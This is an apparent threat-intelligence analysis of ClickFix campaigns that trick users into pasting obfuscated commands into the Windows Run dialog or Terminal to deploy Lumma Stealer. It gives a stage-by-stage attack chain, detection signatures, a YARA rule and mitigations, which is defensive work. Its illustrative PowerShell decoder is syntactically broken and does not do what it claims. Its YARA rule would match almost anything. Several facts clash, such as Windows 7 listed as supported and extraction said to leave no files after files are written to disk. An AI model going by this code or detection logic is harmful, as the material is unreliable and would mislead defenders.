ClickFix Campaigns Targeting Windows and macOS: A Deep Technical Analysis

Executive Summary

ClickFix is a social‑engineering technique that coerces users into executing obfuscated commands in native Windows tools—initially the Run dialog, now the Windows Terminal. The technique has evolved to deliver the Lumma Stealer, a file‑less, LOLBin‑based malware that harvests browser credentials and exfiltrates data via cryptocurrency RPC endpoints. The attacks target all supported Windows versions, macOS, and high‑value brands such as QuickBooks, Booking.com, and Birdeye. Defenders must harden user interaction with the Run dialog and Terminal, enforce application whitelisting, and deploy Microsoft Defender XDR signatures to detect the multi‑stage chain.

Technical Analysis

1. Root Cause & Threat Actor TTPs

ClickFix is not a traditional software vulnerability; it exploits the trust model of Windows’ command‑execution interfaces. The attackers rely on:

  1. Human Trust – Users are presented with a fake security warning or CAPTCHA that appears legitimate.
  2. Native Tool Abuse – The Run dialog (Win+R) or Windows Terminal (Win+X → I) are leveraged because they are built‑in, trusted, and often exempt from application control policies.
  3. Obfuscated Commands – Hex‑encoded, XOR‑compressed scripts that evade static analysis and bypass simple string‑based detection.

The attack chain is a multi‑stage, file‑less process that uses legitimate binaries (PowerShell, cmd.exe, MSBuild.exe, 7‑Zip) as LOLBins to load and execute the payload in memory.

2. Step‑by‑Step Exploitation Chain

Stage Action Technical Detail Tools Involved
1. Delivery Victim receives phishing, malvertising, or drive‑by link. Lure page displays a fake security warning or CAPTCHA. Browser
2. User Interaction Victim opens Run dialog (Win+R) or Windows Terminal (Win+X → I). Prompt instructs user to copy a hex‑encoded command. Win+R / wt.exe
3. Command Execution User pastes command into Run/Terminal. The command spawns additional Terminal/PowerShell instances. PowerShell, cmd.exe
4. Decoding PowerShell decodes XOR‑compressed script. Script is executed in memory. PowerShell
5. Payload Download Decoded script downloads a ZIP payload and a renamed 7‑Zip binary. Randomized filenames are written to disk. 7‑Zip (7z.exe)
6. Extraction 7‑Zip extracts ZIP contents, triggering a multi‑stage chain. Extraction occurs in memory; no persistent files. 7‑Zip
7. Batch & VBS Deployment Batch script written to %AppData%\Local, VBS to %TEMP%. Batch executed with /launched argument. cmd.exe
8. LOLBin Abuse Batch is executed via MSBuild.exe, which runs arbitrary code. MSBuild.exe is a legitimate build tool; its execution is rarely restricted. MSBuild.exe
9. Credential Harvesting Script connects to cryptocurrency RPC endpoints (etherhiding). QueueUserAPC() injects code into chrome.exe/msedge.exe. Win32 API
10. Exfiltration Harvested credentials (Web Data, Login Data) are sent to attacker‑controlled infrastructure. Data is encrypted and transmitted over HTTP/HTTPS to RPC endpoints. Network

Example of a Hex‑Encoded, XOR‑Compressed Command (Illustrative)

# The real command is not disclosed in public sources.
# An illustrative placeholder demonstrates the structure.

$hex = "48656c6c6f2c20776f726c6421"   # "Hello, world!" in hex
$xorKey = 0xAA
$decoded = foreach ($b in ($hex -split ' '..'') { [char]($b -bxor $xorKey) }
$decoded

Note: The actual payload uses a longer, XOR‑compressed script that launches PowerShell, downloads the ZIP, and orchestrates the LOLBin chain.

3. Affected Versions & Configurations

Product Affected Versions Notes
Microsoft Windows All supported versions (Windows 7 + Server 2008 + later) No specific CVE; technique relies on built‑in tools.
Windows Terminal (wt.exe) All released builds Newest variants use this as the primary interaction vector.
7‑Zip (7z.exe) All versions Renamed binary is used to extract the ZIP payload.
Microsoft PowerShell All versions Decodes and executes the obfuscated script.
Windows Command Shell (cmd.exe) All versions Executes batch scripts with /launched.
MSBuild.exe All versions Used to run arbitrary code via LOLBin abuse.
macOS Targeted in some campaigns Similar social‑engineering lures, but execution chain differs.

No patch is required because the technique exploits legitimate binaries; mitigation relies on policy hardening and detection.

4. Attack Surface & Deployment Scenarios

  • Enterprise Environments: Users with administrative privileges or those who can run PowerShell/Terminal are prime targets.
  • Remote Desktop / RDP: Attackers can deliver lures via RDP session prompts.
  • Shared Workstations: Users may inadvertently execute the command if the Run dialog is enabled.
  • MacOS: While the primary chain uses Windows tools, macOS variants may use Terminal or AppleScript to achieve similar outcomes.

Impact Assessment

Scope & Scale

  • Global Reach: Campaigns observed in February and March 2026, targeting thousands of enterprise and end‑user devices daily.
  • High‑Value Targets: QuickBooks, Booking.com, Birdeye, and other brands were impersonated to lower user suspicion.
  • Credential Theft: The Lumma Stealer harvests browser artifacts (Web Data, Login Data), cryptocurrency wallet information, and session cookies.
  • Exfiltration: Data is sent to attacker‑controlled cryptocurrency RPC endpoints, obfuscating traffic.

Real‑World Consequences

  • Data Breaches: Compromise of login credentials can lead to lateral movement, ransomware deployment, or phishing amplification.
  • Reputational Damage: Brands impersonated in lures suffer trust erosion.
  • Financial Loss: Exfiltration of cryptocurrency wallets and credential theft can result in direct monetary theft.

Comparison to Past Incidents

  • Log4Shell (CVE‑2021‑44228): Both exploit a widely used component (JNDI lookup vs. Windows Terminal) to execute code.
  • Mimikatz via PowerShell: Similar use of PowerShell for credential dumping, but ClickFix adds a multi‑stage, file‑less chain that bypasses traditional endpoint protection.
  • Phishery: The social‑engineering component mirrors earlier phishing campaigns that leveraged fake security warnings.

Detection & Response

Log Signatures

Log Source Indicator Example
Windows Event Log – Process Creation Creation of wt.exe with suspicious command line EventID=4688, NewProcessName=wt.exe, CommandLine="wt -d ..."
PowerShell Module Logging Decoding of XOR‑compressed script EventID=4104, ScriptBlockText=...
MSBuild Execution MSBuild.exe invoked with non‑standard arguments EventID=4688, NewProcessName=MSBuild.exe, CommandLine="/t:Build /p:Configuration=Release"
Network Outbound HTTPS to known cryptocurrency RPC endpoints DestinationIP=203.0.113.42, DestinationPort=443, URL=/api/submit

YARA Rule Example

rule ClickFix_PowerShell_Decode
{
    meta:
        description = "Detects XOR‑compressed PowerShell decoding in ClickFix campaigns"
        author = "Karma‑X Threat Intelligence"
        reference = "https://www.recordedfuture.com/research/clickfix-campaigns-targeting-windows-and-macos"
    strings:
        $xorKey = { AA }
        $hexPattern = /[0-9a-fA-F]{4,}/
    condition:
        all of ($hexPattern) and $xorKey
}

Behavioral Detection

  1. Unusual Terminal Usage: A non‑admin user launching wt.exe or cmd.exe with /launched flag.
  2. In‑Memory Execution: Process creation without associated file on disk (e.g., PowerShell running a script block).
  3. Cryptocurrency RPC Traffic: Encrypted HTTPS traffic to IPs/domains associated with known blockchain nodes.
  4. MSBuild Abuse: Execution of MSBuild.exe outside of build environments.

Mitigation & Remediation

Priority Action Rationale
1 Disable Run dialog (Win+R) for non‑admin users via Group Policy (User Configuration → Administrative Templates → System → Prevent access to the Run dialog). Removes primary vector.
2 Restrict Windows Terminal (wt.exe) via AppLocker or Software Restriction Policies. Prevents execution of malicious commands.
3 Enforce Application Whitelisting for 7‑Zip, PowerShell, cmd.exe, MSBuild.exe. Blocks renamed binaries and LOLBin abuse.
4 Deploy Microsoft Defender XDR with built‑in ClickFix signatures. Detects multi‑stage chain.
5 Enable PowerShell Script Block Logging (Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell" -Name "EnableScriptBlockLogging" -Value 1). Captures decoded scripts.
6 Block outbound connections to known cryptocurrency RPC endpoints (e.g., via firewall or DNS filtering). Stops exfiltration.
7 Conduct user education on fake security warnings, CAPTCHAs, and troubleshooting prompts. Reduces social‑engineering success.
8 Monitor %AppData%\Local and %TEMP% for batch or VBS files with /launched flag. Early detection of stage 7.

Timeline

  • 2025‑08‑21 – Microsoft blog detailing ClickFix technique and evolution.
  • 2026‑02 – Yahoo article reports attackers using Windows Terminal instead of Run dialog.
  • 2026‑03 – HackerNews article discloses new widespread ClickFix campaign leveraging Windows Terminal.

Sources & References

  1. ClickFix Campaigns Targeting Windows and macOS – Recorded Future
  2. Think before you Click(Fix): Analyzing the ClickFix social engineering technique – Microsoft Security Blog
  3. ClickFix Attacks – HHS Sector Alert
  4. Microsoft warns ClickFix attacks targeting Windows Terminal to trick users – Yahoo Tech
  5. Microsoft Reveals ClickFix Campaign Using Windows Terminal to Deploy Lumma Stealer – The Hacker News

Sources

  1. ClickFix Campaigns Targeting Windows and macOS
  2. Think before you Click(Fix): Analyzing the ClickFix social engineering ...
  3. ClickFix Attacks
  4. Microsoft warns ClickFix attacks targeting Windows Terminal to trick users
  5. Microsoft Reveals ClickFix Campaign Using Windows Terminal to Deploy Lumma Stealer